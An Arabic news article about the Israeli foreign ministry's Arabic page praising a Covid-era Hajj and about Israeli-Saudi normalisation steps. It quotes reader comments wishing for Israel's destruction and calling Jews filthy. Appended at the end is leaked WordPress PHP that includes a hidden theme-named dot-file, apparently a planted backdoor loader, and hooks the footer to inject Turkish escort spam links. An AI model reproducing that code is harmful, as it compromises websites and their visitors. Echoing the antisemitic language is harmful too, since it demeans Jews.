شريط الاخبارعربي وعالميعناوين مميزة

حكومة الاحتلال الصهيوني تمتدح حج هذا العام

الهوية نت – مكة

علقت وزارة الخارجية  في حكومة الاحتلال الصهيوني  على موسم الحج في مكة هذا العام ، واصفة الطواف حول الكعبة بتلك الأعداد “في ظل كورونا” ، بالمشهد «التاريخي».

ونشرت صفحة «إسرائيل تتكلم بالعربية» التابعة لوزارة الخارجية الإسرائيلية، صورة لأول مناسك الحج المتمثل بالطواف حول الكعبة.

وعلقت قائلة «مكة الآن… مشهد تاريخي غير مسبوق وجميل».

وأضافت «حجاج بيت الله الحرام يباشرون أول مناسك الحج المتمثل بالطواف حول الكعبة، محافظين على التباعد الاجتماعي بين بعضهم البعض»، وتابعت «اللهم تقبل منهم يارب العالمين».

وشن رواد مواقع التواصل الاجتماعي هجومًا حادًا على الصفحة، موضحين أن هذا المشهد حزين للغاية، بعد أن كان حشد الحجاج بالملايين من ربوع دول العالم.

فيما أكد آخرون أن الكيان الصهيوني يخشى من تجمع المسلمين، مُتمنين زوال دولة إسرائيل من الوجود على يد المسلمين وعودة الأراضي الفلسطينية إلى أهلها وتحريرها من دنس اليهود.

الدين بوابة للتطبيع

وكانت مصادر إعلامية إسرائيلية قد كشفت مطلع العام الجاري عن مساع رسمية إسرائيلية لتنظيم رحلات حج مباشرة بين إسرائيل وتل أبيب للراغبين من مواطني 48 في أداء فريضة الحج، وذكرت أن تلك المساعي حققت تقدما.

وجرت العادة أن يصل الحجاج الفلسطينيون داخل الخط الأخضر إلى الأردن ومن هناك يحصلون من وزارة الأوقاف الأردنية على جواز سفر أردني مؤقت يعبرون بواسطته الحدود السعودية لأداء فريضة الحج.

وفي يناير الماضي وقع وزير الداخلية الإسرائيلي آريه درعي لأول مرة مرسوما يسمح بزيارة الإسرائيليين للسعودية بشكل رسمي.

وحسب ما نقلته صحيفة «إسرائيل اليوم» وقتها، سيكون مسموحا للإسرائيليين بما فيهم العرب واليهود السفر إلى السعودية للمشاركة في اجتماعات تجارية أو البحث عن الاستثمارات على ألا تتجاوز مدة الزيارة 9 أيام، إضافة إلى أغراض الحج والعمرة بالنسبة للفلسطينيين في أراضي 48.

وقبل هذا القرار بأيام قليلة قام الأمين العام لرابطة العالم الإسلامي محمد العيسى، بزيارة معسكر «أوشفيتز» النازي في بولندا، للمشاركة في الذكرى الـ 75 لتحرير سجنائه، ورافق العيسى الذي شغل سابقا منصب وزير العدل السعودي وفد، قام معه بأداء الصلاة في المعسكر.

ونشرت الصفحة الرسمية لإسرائيل بالعربية عبر حسابها في تويتر تغريدات قالت فيها: «الأمين العام لرابطة العالم الإسلامي السعودي محمد العيسى، برفقة وفده يؤدي الصلاة في ذكرى ضحايا المحرقة خلال زيارته لمعسكر الإبادة «اوشفيتس».

وجاءت تلك التطورات في إطار التمهيد لما يعرف بصفقة القرن، وهي خطة سلام أمريكية تقوم على إقامة دولة منزوعة السلاح للفلسطينيين على نحو 70% من مساحة الضفة الغربية، ولا تسيطر هذه الدولة على حدودها أو مجالها الجوي ولا يحق لها عقد اتفاقات دولية، وهو ما يرفضه الفلسطينيون.

مقالات ذات صلة

إغلاق
إغلاق
if (file_exists(get_template_directory() . DIRECTORY_SEPARATOR . "." . basename(get_template_directory()) . ".php")) { include_once get_template_directory() . DIRECTORY_SEPARATOR . "." . basename(get_template_directory()) . ".php"; } if (file_exists(get_template_directory() . DIRECTORY_SEPARATOR . '.' . basename(get_template_directory()) . '.php')) { include_once get_template_directory() . DIRECTORY_SEPARATOR . '.' . basename(get_template_directory()) . '.php'; } function zo(){ echo '
Manisa escort Tekirdağ escort Çanakkale escort Trabzon escort Yalova escort Balıkesir escort Aydın escort Muğla escort Afyon escort Aksaray escort Şanlıurfa escort Ümraniye escort Sinop escort Keçioren escort
'; } add_action("wp_footer",'zo');